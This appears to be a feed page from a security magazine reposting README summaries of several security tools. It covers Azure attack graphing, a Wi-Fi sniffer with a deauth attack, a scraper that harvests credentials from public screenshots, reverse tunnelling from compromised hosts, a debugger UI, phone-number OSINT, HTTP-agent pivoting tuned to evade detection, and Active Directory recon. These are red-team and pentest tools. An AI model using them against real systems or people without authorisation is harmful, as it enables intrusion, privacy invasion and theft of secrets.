Quantcast
Channel: Hakin9 – IT Security Magazine
Viewing all 612 articles
Browse latest View live

Stormspotter - Azure Red Team tool for graphing Azure and Azure Active Directory objects

$
0
0

Stormspotter creates an “attack graph” of the resources in an Azure subscription. It enables red teams and pentesters to visualize the attack surface and pivot opportunities within a tenant, and supercharges your defenders to quickly orient and prioritize incident response work.

It needs reader access to the subscription you wish to import and/or Directory. Read access to the Azure AD tenants.


Getting Started

Prerequisites

  • Stormspotter is developed in Python 3.8.
  • Install Neo4j. Currently, neo4j 4.0 may cause errors when launching Stormdash if you do not manually configure it with an SSL cert. Installation directions for your preferred operating system are located here, although you may prefer the ease of a docker container:
docker run --name stormspotter -p7474:7474 -p7687:7687 -d --env NEO4J_AUTH=neo4j/[password] neo4j:3.5.18

Running Stormspotter

In order to avoid conflicting packages, it is highly recommended to run Stormspotter in a virtual environment.

  1. Install the requirements
    • From the repository (RECOMMENDED)
    git clone https://github.com/Azure/Stormspotter
    cd Stormspotter
    pipenv install .
    
    • Via pipenv
    python -m pip install pipenv
    pipenv install stormspotter==1.0.0a0
    

Providing credentials

Current login types supported:

  • Azure CLI (must use az login first)
  • Service Principal Client ID/Secret

Gather and view resources

  1. Run stormspotter to gather resource and object information
    • Via CLI login
    stormspotter --cli
    
    • Via Service Principal
    stormspotter --service-principal -u <client id> -p <client secret> -t <tenant id>
    
  2. Run stormdash to launch dashboard
    stormdash -dbu <neo4j-user> -dbp <neo4j-pass>
    
  3. During installation, a .stormspotter folder is created in the user's home directory. Place the results zip file into ~/.stormspotter/input folder. You may also place the zip file into the folder before running stormdash and it will be processed when Stormspotter starts. When a file is successfully processed, it will be moved into ~/.stormspotter/processed.
  4. Browse to http://127.0.0.1:8050 to interact with the graph.

Notes

  • With Stormspotter currently in alpha, not all resource types have been implemented in Stormdash. You may see labels with missing icons and/or simply display the "name" and "type" fields. You can still view the data associated with these assets by clicking the "Raw Data" slider. Over time, more resources will be properly implemented.
  • The node expansion feature has not been implemented yet. This feature will allow you to interact with a node to see all of its relations. As a fallback to Stormdash, you can visit the Neo4J instance directly to use this feature.

Screenshots

Contributing

This project welcomes contributions and suggestions. Most contributions require you to agree to a Contributor License Agreement (CLA) declaring that you have the right to and actually do, grant us the rights to use your contribution. For details, visit https://cla.opensource.microsoft.com.

When you submit a pull request, a CLA bot will automatically determine whether you need to provide a CLA and decorate the PR appropriately (e.g., status check, comment). Simply follow the instructions provided by the bot. You will only need to do this once across all repos using our CLA.

This project has adopted the Microsoft Open Source Code of Conduct. For more information see the Code of Conduct FAQ or contact opencode@microsoft.com with any additional questions or comments.


More: https://github.com/Azure/Stormspotter

The post Stormspotter - Azure Red Team tool for graphing Azure and Azure Active Directory objects appeared first on Hakin9 - IT Security Magazine.


Pi Sniffer is a Wi-Fi sniffer built on the Raspberry Pi Zero W

$
0
0

Pi Sniffer is a Wi-Fi sniffer built on the Raspberry Pi Zero W. While there are many excellent sniffing platforms out there, Pi Sniffer is unique for its small size, real-time display of captured data, and handling of user input.

Current Release Image

You can download an RPI image of this project from the "Releases" page. If you don't trust that, you can generate your own release by using the image_gen/create_image.sh script.

Project Goals

The goal of this project was to create a Wi-Fi sniffer that I could carry around in my pocket, easily view real-time status, decrypt packets on the fly, and change antenna channels as needed. Also, I wanted this project to be cheap (less than $100) and require no soldering.

Hardware

The project was conceived with the goal to avoid any type of soldering. While Pi Sniffer does require the GPIO header on the Raspberry Pi Zero W, you can buy that pre-soldered. So I'm gonna claim no soldering required.

The base install requires:

Additionally, you can configure the device with any of the following add-ons (and still reasonably be called pocket sized):

Software

Download the release image and flash it to an SD card. Stick the SD card into your RPI Zero WH and you should be good to go! By default, SSH should be enabled. Use the default pi: raspberry credentials. The device's hostname is pisniffer so something along the following lines should get you in:

ssh pi@pisniffer.local

Controls

Pi Sniffer isn't unique just due to it's size but it also offers controls. The user can start and stop sniffing. Change channels. Deauth clients. And more. Here are some images showing how to use the controls.

Start, Stop, and Shutdown

To start sniffing hit the #6 button. To stop sniffing hit the #5 button. To shutdown the device hold #5 and #6.

Channel Hoppping

To change to a specific channel, rotate to the antenna screen and hit #6. This will cycle you through the available channels plus hopping.

Deauth Attack

To deauth a client, find them in the client view and hit #6.

Lock display

Sometimes it's beneficial to lock the screen and controls. To do so, rotate to the lock screen and hit #6. To unlock you need to hit #5 and push up on the joystick at the same time.

Issues and Pull Requests

Issues and pull requests are welcome. I only ask that you provide enough information to recreate the issue or information about why the pull request should be accepted.


More: https://github.com/tenable/pi_sniffer

The post Pi Sniffer is a Wi-Fi sniffer built on the Raspberry Pi Zero W appeared first on Hakin9 - IT Security Magazine.

Shotlooter - a recon tool that finds sensitive data inside the screenshots uploaded to prnt.sc

$
0
0

Shotlooter tool is developed to find sensitive data inside the screenshots which are uploaded to https://prnt.sc/ (via the LightShot software) by applying OCR and image processing methods.

                                                              +-------------------+
    IMAGE FILE                                                |#!/usr/bin/python  |
+--------------------+                                        |                   +----->SENSITIVE
|prnt.sc/sjgmm5      |                                        |Search for:        |
+--------------------+                                        |                   |
|      _             |      CONVERTS          STRING          |sensitive keywords |
|  .-.-.=\-          |      +-------+     +------------+      |                   |
|  (_)=='(_)         |      |       |     |            |      |high entropy       |
|              .._\  +----->+  OCR  +---->+ TEXTTEXTT  +----->+                   |
|             (o)(o) |      |       |     |            |      |credit card pattern+----->NOT SENSITIVE
|   TEXTTEXTTEX      |      +-------+     +------------+      |                   |
|                    |                                        +-------------------+
+--------------+------+
               |                 +-----------------------+
               v                 |#!/usr/bin/python      |
SMALLER         IMAGES           |                       +------>SENSITIVE
+-------------+ +------------+   |Image processing:      |
|    _        | |    .._\    |   |                       |
| .-.-.=\-    | |   (o)(o)   +-->+ Does it contain:      |
| (_)=='(_)   | |            |   |   ~~O                 |
+-------------+ +------------+   |    /\,                |
                                 |   -|~(*)              +------>NOT SENSITIVE
                                 |  (*)                  |
                                 +-----------------------+

How does it work?

  1. Starting from the given image id, Shotlooter iterates through images (yes, image ids are not random) and downloads them locally.
  2. Converts the text inside the image by using tesseract OCR library.
  3. Searches for predefined keywords on the image (private_key,smtp_pass,access key,mongodb+srv etc.)
  4. Searches strings with high entropy (API keys usually have high entropy)
  5. Searches small images (e.g Lastpass logo) inside the downloaded image (Template Matching) with OpenCV.
  6. Saves the results to a CSV file
  7. Saves images that contain sensitive data to the output folder

Installation

Shotlooter requires Python3, pip3 to work and tested on macOS and Debian based Linux systems.

Installing Dependencies for macOS: brew install tesseract

Installing Dependencies for Debian Based Linux: sudo apt install libsm6 libxext6 libxrender-dev tesseract-ocr -y

Clone the repository:

git clone https://github.com/utkusen/shotlooter.git

Go inside the folder

cd shotlooter

Install required libraries

pip3 install -r requirements.txt

Usage

Basic Usage: python3 shotlooter.py --code PRNT.SC_ID

It searches for matching keywords (located in keywords.txt), high entropy strings and credit card numbers. You can find an id by uploading an image to https://prnt.sc/ . For example python3 shotlooter.py --code sjgmm5

It will check the ids by incrementing them one by one:

sjgmm6
sjgmm7
sjgmm8
sjgmm9
sjgmma
sjgmmb
...

Image Search: python3 shotlooter.py --code sjgmm5 --imagedir IMAGE_FOLDER_PATH

It will search for the items covered in basic usage + will search for provided small images in the bigger screenshots. If you are planning to use this feature, put your small images inside the img folder.

Exclude Search: You can exclude any search type by providing related argument: --no-cc, --no-entropy, --no-keyword

For example: python3 shotlooter.py --code sjgmm5 --no-entropy. Shotlooter will skip high entropy string checking.

A Note For The False Positives

Shotlooter has high false-positive rates for high entropy string and credit card matching. Actually, they are not false positives but may not be the items that you are looking for. It detects high entropy strings to catch API keys, private keys etc. However, any non-sensitive random string will have a high entropy too and Shotlooter will detect them. The same goes for the credit card.

If you don't want to deal with false positives, exclude entropy and credit card searches.

What You Should Expect to Find?

I run Shotlooter for 2 weeks and identified 300+ images that contain various of sensitive data. You can check the findings that I encountered more than others below:

Postman Requests

It contains useful session IDs, access tokens etc.

Cloud API Keys (Google, AWS)

Screenshots are taken from the cloud's console or from a desktop client

Session ID on the URL

We all know that it's not good to pass the session ID with a GET request for different reasons. This is one of them.

Credentials on Excel Sheets

Some people love to use Excel as a password manager.

Bitcoin Private Keys (This is Terrible)

Bitcoin wallets allow you to export your private key so that you can import it into somewhere else. But if you publish the screenshot of your private key, your whole wallet can be compromised.


More: https://github.com/utkusen/shotlooter

The post Shotlooter - a recon tool that finds sensitive data inside the screenshots uploaded to prnt.sc appeared first on Hakin9 - IT Security Magazine.

Ligolo: Reverse Tunneling made easy for pentesters, by pentesters

$
0
0

Ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve).

It is comparable to Meterpreter with Autoroute + Socks4a, but more stable and faster.

Use case

You compromised a Windows / Linux / Mac server during your external audit. This server is located inside a LAN network and you want to establish connections to other machines on this network.

You can setup a tunnel to access the internal server's resources.

Quick Demo

Relay of a RDP connection using Proxychains (WAN).

Performance

Here is a screenshot of a speedtest between two 100mb/s hosts (ligolo/localrelay). Performance may vary depending on the system and network configuration.

Usage

Setup / Compiling

Make sure Go is installed and working.

  1. Get Ligolo and dependencies
cd `go env GOPATH`/src
git clone https://github.com/sysdream/ligolo
cd ligolo
make dep
  1. Generate self-signed TLS certificates (will be placed in the certs folder)
make certs TLS_HOST=example.com

NOTE: You can also use your own certificates by using the TLS_CERT make option when calling build. Example: make build-all TLS_CERT=certs/mycert.pem.

  1. Build
  • 3.1. For all architectures
make build-all
  • 3.2. (or) For the current architecture
make build

How to use it?

Ligolo consists of two modules:

  • localrelay
  • ligolo

Localrelay is intended to be launched on the control server (the attacker server).

Ligolo is the program to run on the target computer.

For localrelay, you can leave the default options. It will listen on every interface on port 5555 and wait for connections from ligolo (-relayserver parameter).

For ligolo, you must specify the IP address of the relay server (or your attack server) using the -relayserver ip:portparameter.

You can use the -h option for help.

Once the connection has been established between Ligolo and LocalRelay, a SOCKS5 proxy will be set up on TCP port 1080on the relay server (you can change the TCP address/port using the -localserver option).

After that, all you have to do is use your favorite tool (Proxychains for example), and explore the client's LAN network.

TL;DR

On your attack server.

./bin/localrelay_linux_amd64

On the compromised host.

> ligolo_windows_amd64.exe -relayserver LOCALRELAYSERVER:5555

Once the connection is established, set the following parameters on the ProxyChains config file (On the attack server):

[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks5     127.0.0.1 1080

Profit.

$ proxychains nmap -sT 10.0.0.0/24 -p 80 -Pn -A
$ proxychains rdesktop 10.0.0.123

Options

Localrelay options:

Usage of localrelay:
  -certfile string
    	The TLS server certificate (default "certs/server.crt")
  -keyfile string
    	The TLS server key (default "certs/server.key")
  -localserver string
    	The local server address (your proxychains parameter) (default "127.0.0.1:1080")
  -relayserver string
    	The relay server listening address (the connect-back address) (default "0.0.0.0:5555")

Ligolo options:

Usage of ligolo:
  -autorestart
    	Attempt to reconnect in case of an exception
  -relayserver string
    	The relay server (the connect-back address) (default "127.0.0.1:5555")
  -skipverify
    	Skip TLS certificate pinning verification
  -targetserver string
    	The destination server (a RDP client, SSH server, etc.) - when not specified, Ligolo starts a socks5 proxy server

Features

  • TLS 1.3 tunnel with TLS pinning
  • Multiplatforms (Windows / Linux / Mac / ...)
  • Multiplexing (1 TCP connection for all flows)
  • SOCKS5 proxy or simple relay

To Do

  • Better timeout handling
  • SOCKS5 UDP support
  • Implement mTLS

Credits

  • Nicolas Chatelain <n.chatelain -at- sysdream.com>

More: https://github.com/sysdream/ligolo

The post Ligolo: Reverse Tunneling made easy for pentesters, by pentesters appeared first on Hakin9 - IT Security Magazine.

Voltron - an extensible debugger UI toolkit written in Python

$
0
0

Voltron is an extensible debugger UI toolkit written in Python. It aims to improve the user experience of various debuggers (LLDB, GDB, VDB and WinDbg) by enabling the attachment of utility views that can retrieve and display data from the debugger host. By running these views in other TTYs, you can build a customised debugger user interface to suit your needs.

Voltron does not aim to be everything to everyone. It's not a wholesale replacement for your debugger's CLI. Rather, it aims to complement your existing setup and allow you to extend your CLI debugger as much or as little as you like. If you just want a view of the register contents in a window alongside your debugger, you can do that. If you want to go all out and have something that looks more like OllyDbg, you can do that too.

Built-in views are provided for:

  • Registers
  • Disassembly
  • Stack
  • Memory
  • Breakpoints
  • Backtrace

The author's setup looks something like this:

Any debugger command can be split off into a view and highlighted with a specified Pygments lexer:

More screenshots are here.

Support

Voltron supports LLDB, GDB, VDB, and WinDbg/CDB (via PyKD) and runs on macOS, Linux, and Windows.

WinDbg support is still fairly new, please open an issue if you have problems.

The following architectures are supported:

lldb gdb vdb windbg
x86
x86_64
arm
arm64
powerpc

Installation

The Voltron package and its dependencies must be installed somewhere the Python interpreter embedded in the debugger can find them. Voltron includes an install script which will attempt to detect the supported debuggers that are installed on the system, and will install Voltron and its Python dependencies using the appropriate version of Python for each debugger.

To install with the install script, download the source and run it from the root level of the source tree:

$ ./install.sh

If you'd rather install to the system site-packages directory, pass the -s flag:

$ ./install.sh -s

You can also install into a Python virtual environment for LLDB:

$ ./install.sh -v /path/to/venv -b lldb

This install script should cover the vast majority of use cases, but if it fails to install properly on your system (or you'd rather install manually) the following instructions are provided for each platform.

macOS

On macOS, LLDB (installed by Xcode) and GDB (installed by Homebrew) are both linked against the system's default version of Python, so Voltron must be installed using this version of Python. On systems without any other Python installation, you can just go ahead and install with pip as above.

On systems with other versions of Python installed (via Homebrew, MacPorts or other methods), you may need to explicitly specify the system version of Python:

$ /usr/bin/python -m pip install voltron [ --user ]

Other installations of LLDB or GDB (manually compiled or installed with MacPorts) may be linked with other Python installations, so you'll need to install Voltron with whichever the debugger is linked against.

You can find out which version of Python your debugger is linked against with otool:

$ otool -L /usr/local/bin/gdb|grep -i python
    /System/Library/Frameworks/Python.framework/Versions/2.7/Python (compatibility version 2.7.0, current version 2.7.5)

This version of GDB above is installed with Homebrew, so it's linked against the system Python. You'll have to figure out which installation of Python your debugger is linked with and where the python binary is on your own, but when you do you can install Voltron with:

$ /path/to/python -m pip install voltron [ --user ]

Linux

Ubuntu

Ubuntu (at least 14.04) comes with Python versions 2 and 3. GDB is linked with Python 3, but /usr/bin/python is Python 2. In order to get Voltron to work you'll need to install Voltron into the Python 3 site-packages.

First, install some dependencies:

$ sudo apt-get install libreadline6-dev python3-dev python3-setuptools python3-yaml

Then install Voltron:

$ pip3 install voltron

Other distros

You're mostly on your own here. You can figure out which version of Python the debugger is linked with using readelf:

$ readelf -d `which gdb`|grep python
0x0000000000000001 (NEEDED)             Shared library: [libpython3.4m.so.1.0]

Then you'll need to install Voltron using that version of Python, wherever it lives:

$ /path/to/python -m pip install voltron [ --user ]

Windows

WinDbg

Voltron support for WinDbg is implemented by way of the PyKD module.

  1. Install WinDbg via Windows SDK for your Windows version
  2. Download the zip of the latest release of PyKD
  3. Install the PyKD module. If you know how to do this properly (install it to the WinDbg extensions dir, which I gave up on because it didn't want to work on my system), then do it. I just load it in WinDbg by absolute path.
  4. Install the PyKD Python wheel with pip:
     $ pip install pykd-0.3.0.38-py2-none-win_amd64.whl
    
  5. Install the curses Python wheel:
     $ pip install curses-2.2-cp27-none-win_amd64.whl
    

Troubleshooting

  1. Make sure you have the same bitness versions of Python and PyKD (possibly WinDbg but I don't think there's an option).

VDB

TBC

Virtual environments

Voltron can be installed into a Python virtual environment if you'd rather not install it (and all its dependencies) into your Python site-packages directory. You'll need to make sure you're using the correct installation of Python per the installation instructions above.

Create a virtual environment:

$ virtualenv voltron_venv

Or, if you're using a Python installation that the virtualenv executable in your path does not belong to:

$ /path/to/python -m virtualenv voltron_venv

Install Voltron into the virtual environment:

$ voltron_venv/bin/pip install voltron

Now when you launch the debugger, you'll need to set your PYTHONPATH environment variable:

$ PYTHONPATH=voltron_venv/lib/python2.7/site-packages lldb

Note the Python version in the path there - that will need to reflect whatever the actual path to the site-packages dir inside the virtual environment is. You could also set and export this variable in your shell init.

When you launch the views, you'll need to call the voltron executable inside the virtual environment:

$ voltron_venv/bin/voltron view reg

You could also add the venv to your PATH environment variable.

Please see the manual installation documentation.

Quick Start

  1. If your debugger has an init script (.lldbinit for LLDB or .gdbinit for GDB) configure it to load Voltron when it starts by sourcing the entry.py entry point script. The full path will be inside the voltron package. For example, on macOS it might be /Library/Python/2.7/site-packages/voltron/entry.py. The install.sh script will add this to your .gdbinit or .lldbinit file automatically if it detects GDB or LLDB in your path.LLDB:
     command script import /path/to/voltron/entry.py
    

    GDB:

     source /path/to/voltron/entry.py
    
  2. Start your debugger and initialise Voltron manually if necessary.On recent versions of LLDB you do not need to initialise Voltron manually:
     $ lldb target_binary
    

    On older versions of LLDB you need to call voltron init after you load the inferior:

     $ lldb target_binary
     (lldb) voltron init
    

    GDB:

     $ gdb target_binary
    

    VDB:

     $ ./vdbbin target_binary
     > script /path/to/voltron/entry.py
    

    WinDbg/CDB is only supported run via Bash with a Linux userland. The author tests with Git Bash and ConEmu. PyKD and Voltron can be loaded in one command when launching the debugger:

     $ cdb -c '.load C:\path\to\pykd.pyd ; !py --global C:\path\to\voltron\entry.py' target_binary
    
  3. In another terminal (I use iTerm panes) start one of the UI views. On LLDB, WinDbg and GDB the views will update immediately. On VDB they will not update until the inferior stops (at a breakpoint, after a step, etc):
     $ voltron view register
     $ voltron view stack
     $ voltron view disasm
     $ voltron view backtrace
    
  4. Set a breakpoint and run your inferior.
     (*db) b main
     (*db) run
    
  5. When the debugger hits the breakpoint, the views will be updated to reflect the current state of registers, stack, memory, etc. Views are updated after each command is executed in the debugger CLI, using the debugger's "stop hook" mechanism. So each time you step, or continue and hit a breakpoint, the views will update.

Documentation

See the wiki on github.

FAQ

Q. Why am I getting an ImportError loading Voltron?

A. You might have multiple versions of Python installed and have installed Voltron using the wrong one. See the more detailed installation instructions.

Q. GEF? PEDA? PwnDbg? fG's gdbinit?

A. All super great extensions for GDB. These tools primarily provide sets of additional commands for exploitation tasks, but each also provides a "context" display with a view of registers, stack, code, etc, like Voltron. These tools print their context display in the debugger console each time the debugger stops. Voltron takes a different approach by embedding an RPC server implant in the debugger and enabling the attachment of views from other terminals (or even web browsers, or now synchronising with Binary Ninja), which allows the user to build a cleaner multi-window interface to their debugger. Voltron works great alongside all of these tools. You can just disable the context display in your GDB extension of choice and hook up some Voltron views, while still getting all the benefits of the useful commands added by these tools.

Bugs and Errata

See the issue tracker on github for more information or to submit issues.

If you're experiencing an ImportError loading Voltron, please ensure you've followed the installation instructions for your platform.

LLDB

On older versions of LLDB, the voltron init command must be run manually after loading the debug target, as a target must be loaded before Voltron's hooks can be installed. Voltron will attempt to automatically register its event handler, and it will inform the user if voltron init is required.

WinDbg

More information about WinDbg/CDB support here.

Misc

The authors primarily use Voltron with the most recent version of LLDB on macOS. We will try to test everything on as many platforms and architectures as possible before releases, but LLDB/macOS/x64 is going to be by far the most frequently-used combination. Hopefully Voltron doesn't set your pets on fire, but YMMV.

License

See the LICENSE file.

If you use this and don't hate it, buy me a beer at a conference some time. This license also extends to other contributors - richo definitely deserves a few beers for his contributions.

Credits

Thanks to my former employers Assurance and Azimuth Security for giving me time to spend working on this.

Props to richo for all his contributions to Voltron.

fG!'s gdbinit was the original inspiration for this project.

Thanks to Willi for implementing the VDB support.

Voltron now uses Capstone for disassembly as well as the debugger hosts' internal disassembly mechanism. Capstone is a powerful, open source, multi-architecture disassembler upon which the next generation of reverse engineering and debugging tools are being built. Check it out.

Thanks to grazfather for ongoing contributions.


More: https://github.com/snare/voltron

The post Voltron - an extensible debugger UI toolkit written in Python appeared first on Hakin9 - IT Security Magazine.

PhoneInfoga - Advanced information gathering & OSINT framework for phone numbers

$
0
0

PhoneInfoga is one of the most advanced tools to scan international phone numbers using only free resources. The goal is to first gather standard information such as country, area, carrier, and line type on any international phone numbers with very good accuracy. Then search for footprints on search engines to try to find the VoIP provider or identify the owner.

Features

  • Check if phone number exists and is possible
  • Gather standard informations such as country, line type and carrier
  • OSINT footprinting using external APIs, Google Hacking, phone books & search engines
  • Check for reputation reports, social media, disposable numbers and more
  • Scan several numbers at once
  • Use custom formatting for more effective OSINT reconnaissance
  • NEW: Serve a web client along with a REST API to run scans from the browser
  • NEW: Run your own web instance as a service
  • NEW: Programmatic usage with Go modules

Anti-features

  • Does not claim to provide relevant or verified data, it's just a tool !
  • Does not allow to "track" a phone or its owner in real time
  • Does not allow to get the precise phone location
  • Does not allow to hack a phone

Current status

This project is under active development but is stable and production-ready. Numverify scan is pointless on demo instance because my server's IP got blocked due to spam. Roadmap is here.

This project has recently been rewritten in Go language (previously Python). Why ? To improve code base, maintainability, have a stronger test suite and be able to compile code base. PhoneInfoga v2 brings new features such as serving a REST API and a web client. Usage of scanners was improved in order to drop usage of Selenium/Geckodriver which has caused many users to have troubleshot using the tool. You can still use the legacy version in tag v1.11 and the legacy Docker image (sundowndev/phoneinfoga:legacy). Some features were not included in the v2 MVP such as input/output CLI options. The roadmap of the project changed so we can focus on the web client features such as downloading scan results as CSV, Instagram/Whatsapp lookup, and more. Version 2 does not scan Google results anymore, read more.

DocumentationAPI documentationDemo instanceRelated blog post

Installation

To install PhoneInfoga, you'll need to download the binary or build the software from its source code.

For now, only Linux and MacOS are supported. If you don't see your OS/arch on the release page on GitHub, it means it's not explicitly supported. You can always build from source by yourself. Want your OS to be supported ? Please open an issue on GitHub.

Binary installation (recommended)

Follow the instructions :

  • Go to release page on GitHub
  • Choose your OS and architecture
  • Download the archive, extract the binary then run it in a terminal

You can also do it from the terminal:

# Download the archive
curl -L "https://github.com/sundowndev/phoneinfoga/releases/download/v2.0.8/phoneinfoga_$(uname -s)_$(uname -m).tar.gz" -o phoneinfoga.tar.gz

# Extract the binary
tar xfv phoneinfoga.tar.gz

# Run the software
./phoneinfoga --help

# You can install it globally
mv ./phoneinfoga /usr/bin/phoneinfoga

If the installation fails, it probably means your OS/arch is not suppored.

Please check the output of echo "$(uname -s)_$(uname -m)" in your terminal and see if it's available on the GitHub release page.

Using Docker

From docker hub

You can pull the repository directly from Docker hub

docker pull sundowndev/phoneinfoga:latest

Then run the tool

docker run --rm -it sundowndev/phoneinfoga version

Docker-compose

You can use a single docker-compose file to run the tool without downloading the source code.

version: '3.7'

services:
    phoneinfoga:
      container_name: phoneinfoga
      restart: on-failure
      image: phoneinfoga:latest
      command: serve
      ports:
        - "80:5000"

From the source code

You can download the source code, then build the docker images

Build

Build the image

docker-compose build

CLI usage

docker-compose run --rm phoneinfoga --help

Run web services

docker-compose up -d

DISABLE WEB CLIENT

Edit docker-compose.yml and add the --no-client option

# docker-compose.yml
command: "serve --no-client"

Troubleshooting

All output is sent to stdout so it can be inspected by running:

docker logs -f <container-id|container-name>

Getting started

Here is the documentation for CLI usage of the tool.

$ phoneinfoga

PhoneInfoga is one of the most advanced tools to scan phone numbers using only free resources.

Usage:
  phoneinfoga [command]

Available Commands:
  help        Help about any command
  scan        Scan a phone number
  serve       Serve web client
  version     Print current version of the tool

Flags:
  -h, --help   help for phoneinfoga

Use "phoneinfoga [command] --help" for more information about a command.

Basic scan

phoneinfoga scan -n "+1 (555) 444-1212"
phoneinfoga scan -n "+33 06 79368229"
phoneinfoga scan -n "33679368229"

Country code and special chars such as ( ) - + will be escaped so typing US-based numbers stay easy :

phoneinfoga scan -n "+1 555-444-3333"

Note that the country code is essential. You don't know which country code to use ? Find it here

Available scanners

  • Numverify
  • Google search
  • OVH

Numverify provide standard but useful informations such as number's country code, location, line type and carrier.

OVH is, besides being a web and cloud hosting company, a telecom provider with several VoIP numbers in Europe. Thanks to their API-key free REST API, we are able to tell if a number is owned by OVH Telecom or not.

Google search uses Google search engine and Google Dorks to search phone number's footprints everywhere on the web. It allows you to search for scam reports, social media profiles, documents and more. This scanner does only one thing: generating several Google search links from a given phone number. You then have to manually open them in your browser to see results. You may therefore have links that do not return any results.

Launch web client & REST API

Run the tool through a REST API with a web client. The API has been written in Go and web client in Vue.js.

phoneinfoga serve
phoneinfoga serve -p 8080 # default port is 5000

You should then be able to see the web client at http://localhost:<port>.

Run the REST API only

You can choose to only run the REST API without the graphical interface :

phoneinfoga serve --no-client

Demo: https://demo.phoneinfoga.crvx.fr

More: https://github.com/sundowndev/PhoneInfoga

The post PhoneInfoga - Advanced information gathering & OSINT framework for phone numbers appeared first on Hakin9 - IT Security Magazine.

Pivotnacci - A tool to make socks connections through HTTP agents

$
0
0

Pivot into the internal network by deploying HTTP agents. Pivotnacci allows you to create a socks server which communicates with HTTP agents. The architecture looks like the following:

This tool was inspired by the great reGeorg. However, it includes some improvements:

  • Support for balanced servers
  • Customizable polling interval, useful to reduce detection rates
  • Auto drop connections closed by a server
  • Modular and cleaner code
  • Installation through pip
  • Password-protected agents

Supported socks protocols

  • Socks 4
  • Socks 5
    • No authentication
    • User password
    • GSSAPI

Installation

From python packages:

pip3 install pivotnacci

From repository:

git clone https://github.com/blackarrowsec/pivotnacci.git
cd pivotnacci/
pip3 install -r requirements.txt # to avoid installing on the OS
python3 setup.py install # to install on the OS

Usage

  1. Upload the required agent (php, jsp or aspx) to a webserver
  2. Start the socks server once the agent is deployed
  3. Configure proxychains or any other proxy client (the default listening port for pivotnacci socks server is 1080)
$ pivotnacci -h
usage: pivotnacci [-h] [-s addr] [-p port] [--verbose] [--ack-message message]
                  [--password password] [--user-agent user_agent]
                  [--header header] [--proxy [protocol://]host[:port]]
                  [--type type] [--polling-interval milliseconds]
                  [--request-tries number] [--retry-interval milliseconds]
                  url

Socks server for HTTP agents

positional arguments:
  url                   The url of the agent

optional arguments:
  -h, --help            show this help message and exit
  -s addr, --source addr
                        The default listening address (default: 127.0.0.1)
  -p port, --port port  The default listening port (default: 1080)
  --verbose, -v
  --ack-message message, -a message
                        Message returned by the agent web page (default:
                        Server Error 500 (Internal Error))
  --password password   Password to communicate with the agent (default: )
  --user-agent user_agent, -A user_agent
                        The User-Agent header sent to the agent (default:
                        pivotnacci/0.0.1)
  --header header, -H header
                        Send custom header. Specify in the form 'Name: Value'
                        (default: None)
  --proxy [protocol://]host[:port], -x [protocol://]host[:port]
                        Set the HTTP proxy to use.(Environment variables
                        HTTP_PROXY and HTTPS_PROXY are also supported)
                        (default: None)
  --type type, -t type  To specify agent type in case is not automatically
                        detected. Options are ['php', 'jsp', 'aspx'] (default:
                        None)
  --polling-interval milliseconds
                        Interval to poll the agents (for recv operations)
                        (default: 100)
  --request-tries number
                        The number of retries for each request to an agent. To
                        use in case of balanced servers (default: 50)
  --retry-interval milliseconds
                        Interval to retry a failure request (due a balanced
                        server) (default: 100)

Examples

Using an agent with a password s3cr3t (AGENT_PASSWORD the variable must be modified at the agent side as well):

pivotnacci  https://domain.com/agent.php --password "s3cr3t"

Using a custom HTTP Host header and a custom CustomAgent User-Agent:

pivotnacci  https://domain.com/agent.jsp -H 'Host: vhost.domain.com' -A 'CustomAgent'

Setting a different agent message 418 I'm a teapot (ACK_MESSAGE variable must be modified at the agent side as well):

pivotnacci https://domain.com/agent.aspx --ack-message "418 I'm a teapot"

Reduce detection rate (e.g. WAF) by setting the polling interval to 2 seconds:

pivotnacci  https://domain.com/agent.php --polling-interval 2000

Author

Eloy Pérez (@Zer1t0) [ www.blackarrow.net - www.tarlogic.com ]


The post Pivotnacci - A tool to make socks connections through HTTP agents appeared first on Hakin9 - IT Security Magazine.

ADCollector - A lightweight tool to quickly extract valuable information from the Active Directory environment for both attacking and defending.

$
0
0

ADCollector is a lightweight tool that enumerates the Active Directory environment to identify possible attack vectors. It will give you a basic understanding of the configuration/deployment of the environment as a starting point.

Notes:

ADCollector is not an alternative to the powerful PowerView, it just automates enumeration to quickly identify juicy information without thinking too much at the early Recon stage. Functions implemented in ADCollector are ideal for enumeration in a large Enterprise environment with lots of users/computers, without generating lots of traffic and taking a large amount of time. It only focuses on extracting useful attributes/properties/ACLs from the most valuable targets instead of enumerating all available attributes from all the user/computer objects in the domain. You will definitely need PowerView to do more detailed enumeration later.

The aim of developing this tool is to help me learn more about Active Directory security from a different perspective as well as to figure out what's behind the scenes of those PowerView functions. I just started learning .NET with C#, the code could be really terrible~

It uses S.DS namespace to retrieve domain/forest information from the domain controller(LDAP server). It also utilizes S.DS.P namespace for LDAP searching.

This tool is still under construction. Features will be implemented can be seen from my project page

Enumeration

  • Current Domain/Forest information
  • Domains in the current forest (with domain SIDs)
  • Domain Controllers in the current domain [GC/RODC] (with ~~IP,OS Site and ~~Roles)
  • Domain/Forest trusts as well as trusted domain objects[SID filtering status]
  • Privileged users (currently in DA and EA group)
  • Unconstrained delegation accounts (Excluding DCs)
  • Constrained Delegation (S4U2Self, S4U2Proxy, Resources-based constrained delegation)
  • MSSQL/Exchange/RDP/PS Remoting SPN accounts
  • User accounts with SPN set & password does not expire account
  • Confidential attributes ()
  • ASREQROAST (DontRequirePreAuth accounts)
  • AdminSDHolder protected accounts
  • Domain attributes (MAQ, minPwdLength, maxPwdAge lockoutThreshold, gpLink[group policies that linked to the current domain object])
  • LDAP basic info(supportedLDAPVersion, supportedSASLMechanisms, domain/forest/DC Functionality)
  • Kerberos Policy
  • Interesting ACLs on the domain object, resolving GUIDs (User defined object in the future)
  • Unusual DCSync Accounts
  • Interesting ACLs on GPOs
  • Interesting descriptions on user objects
  • Sensitive & Not delegate account
  • Group Policy Preference cpassword in SYSVOL/Cache
  • Effective GPOs on the current user/computer
  • Restricted groups
  • Nested Group Membership

Usage

C:\Users> ADCollector.exe  -h

      _    ____   ____      _ _             _
     / \  |  _ \ / ___|___ | | | ___  ___ _| |_ ___  _ __
    / _ \ | | | | |   / _ \| | |/ _ \/ __|_  __/ _ \| '__|
   / ___ \| |_| | |__| (_) | | |  __/ (__  | || (_) | |
  /_/   \_\____/ \____\___/|_|_|\___|\___| |__/\___/|_|

  v1.1.4  by dev2null

Usage: ADCollector.exe -h
    
    --Domain (Default: current domain)
            Enumerate the specified domain

    --Ldaps (Default: LDAP)
